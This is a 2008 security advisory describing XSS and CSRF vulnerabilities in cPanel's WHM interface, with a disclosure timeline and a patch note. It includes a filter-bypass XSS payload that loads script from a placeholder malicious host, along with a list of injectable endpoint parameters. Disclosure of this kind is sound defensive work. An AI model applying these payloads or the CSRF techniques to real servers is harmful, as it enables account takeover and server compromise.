cpanel-xssxsrf.txt

`1. DESCRIPTION OF THE SOFTWARE  
  
cPanel is a hosting automation tool.  
WHM interface provides access to the heart of the cPanel and WHM package  
and allows a Server Administrator to simply configure a few options and  
be on their way to hosting web sites.  
  
2. DESCRIPTION OF THE VULNERABILITY  
  
There are XSS (identified by CVE-2008-2070) and CSRF (identified by  
CVE-2008-2071) vulnerabilities on cPanel software.  
  
On WHM there is a simple pattern for XSS defense, but this function  
is not well implemented so it's possible to bypass it using a simple  
cheat. This is a simple proof of concept:  
  
>><<<<<<<<<<<<script src="http://malicious.site/code.js" a=>>>>>>>><  
  
In this way the function don't sanitize the string so it's possible  
to inject arbitrary JavaScript/HTML code.  
  
WHM provide, to the administrator or reseller, all function for manage  
the server via Web interface but don't protect them against Cross  
Request Forgery (CSRF).  
To exploit this vulnerability is not necessary to inject any kind of  
code to the victim.  
  
XSS and CSRF flaw is more simple to exploit with cPanel XMLAPI [1]  
that use Authentication Basic of WHM (This API works on the same domain  
and port of WHM).  
  
3. ANALYSIS  
  
The XSS flaws are present in any function that manages user input.  
An example list of vulnerable functions to XSS are:  
* Knowlege Base (/scripts2/knowlegebase?issue=[INJECTION]&domain=)  
* Change Ip to domain (/scripts2/changeip?domain=any&user=[INJECTION])  
* List user account  
(/scripts2/listaccts?searchtype=domain&search=[INJECTION]&acctp=30)  
  
The list above is not complete. It's possible there are other scripts  
vulnerable.  
  
The CSRF flaw is in all functions that allow to perfom an action (like  
restart of a service or the entire server) with HTTP method.  
  
This vulnerability was tested on WHM 11.15.0 - cPanel 11.18.3-R21703.  
  
4. IMPACT  
  
The XSS can be used for create/modify accounts or retrieve important  
informations about them.  
  
With CSRF flaws an attacker can create a new user and gain reseller  
privilege to it, restart a service, suspend an account, change the  
password of an account and many other really intersting things.  
See, for example, "createacct" [2] and "setupreseller" [3] function of  
cPanel XML API.  
  
5. SOLUTION  
  
Vendor released a new version where the XSS flaw is resolved and CSRF  
mitigated enough to consider it trivial.  
Update the cPanel to latest release of yours build.  
All 11.18.4+ and 11.22.3+ builds include the patch. [4]  
  
Note that anti-CSRF function use HTTP "Referer" header, please keep in  
mind is not difficult for an attacker to modify it in various way.  
  
6. TIME LINE  
  
23/03/2008 - Vulnerability discovered  
07/04/2008 - cPanel security team contacted  
25/04/2008 - cPanel insert patch in all public builds  
  
7. CVE REFERENCE  
  
CVE-2008-2070 - XSS  
CVE-2008-2071 - CSRF  
  
8. REFERENCE  
  
[1] http://www.cpanel.net/plugins/xmlapi/  
[2] http://www.cpanel.net/plugins/xmlapi/createacct.html  
[3] http://www.cpanel.net/plugins/xmlapi/setupreseller.html  
[4] http://changelog.cpanel.net/  
  
--  
Matteo Carli  
`